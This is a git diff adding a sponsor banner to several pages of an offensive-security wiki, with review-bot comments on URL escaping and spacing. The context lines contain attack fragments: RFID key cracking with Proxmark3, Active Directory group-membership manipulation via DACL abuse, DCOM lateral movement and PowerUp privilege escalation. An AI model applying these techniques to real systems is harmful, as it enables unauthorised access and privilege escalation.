+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Attacking RFID Systems with Proxmark3 The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux). @@ -71,6 +79,13 @@ proxmark3> script run mfkeys You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration. +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md index 6f81384a6..9495a665d 100644 --- a/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md +++ b/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Context This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs. @@ -267,6 +275,14 @@ Get-DomainGroupMember -Identity "Group Name" | Select MemberName Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## WriteDACL + WriteOwner If you are the owner of a group, like I'm the owner of a `Test` AD group: @@ -518,6 +534,13 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist * [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658) * [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md index 80d3c115a..d9faef94b 100644 --- a/windows-hardening/lateral-movement/dcom-exec.md +++ b/windows-hardening/lateral-movement/dcom-exec.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## MMC20.Application **DCOM** (Distributed Component Object Model) objects are **interesting** due to the ability to **interact** with the objects **over the network**. Microsoft has some good documentation on DCOM [here](https://msdn.microsoft.com/en-us/library/cc226801.aspx) and on COM [here](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx). You can find a solid list of DCOM applications using PowerShell, by running `Get-CimInstance Win32_DCOMApplication`. @@ -154,6 +162,13 @@ The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Emp * The first method was copied from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/), for more info follow the link * The second section was copied from [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/), for more info follow the link +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/windows-hardening/windows-local-privilege-escalation/powerup.md b/windows-hardening/windows-local-privilege-escalation/powerup.md index ec60dce60..fa5375fa8 100644 --- a/windows-hardening/windows-local-privilege-escalation/powerup.md +++ b/windows-hardening/windows-local-privilege-escalation/powerup.md @@ -16,6 +16,13 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** # Invoke @@ -45,6 +52,11 @@ _03/2019_ * [x] Cached Group Policy Preferences .xml files +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
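
Review bot: In todo/radio-hacking/flipper-zero/README.md, and in every other hunk shown here that adds the same block, the two URLs inside the banner are written differently. The Markdown link uses `?utm\_source=referral\&utm\_campaign=hacktricks` with backslash-escaped `_` and `&`, while the `{% embed %}` line uses `?utm_campaign=hacktricks&utm_source=referral`, unescaped and with the parameters in the opposite order. Use one form for both so that a later search-and-replace or link check catches every copy, and confirm that the escaped variant renders to a clean href rather than one containing literal backslashes.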
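
Review bot: In windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md, hunk `@@ -267,6 +275,14 @@` puts a third copy of the banner in the middle of the page, between the `Remove-DomainGroupMember` code block and `## WriteDACL + WriteOwner`, in addition to the copies the same file gets at the top and bottom. The other files shown here carry the block only at the top and bottom. Drop the mid-page copy, or state in the commit message why this page gets one, since it separates two consecutive technical sections with unrelated content.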
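
Review bot: In windows-hardening/windows-local-privilege-escalation/powerup.md, the top hunk `@@ -16,6 +16,13 @@` adds one line fewer than the top hunks of the other files (`+16,13` against `+12,14`), and its `+***` is not followed by an added blank line before `# Invoke` the way it is before `## Intro` elsewhere. The bottom hunk `@@ -45,6 +52,11 @@` is likewise two lines shorter than the `+..,13` bottom hunks in the other files. Check that a blank line still separates `***` from the heading and that the trailing banner is spaced like the rest, so the block renders the same on every page.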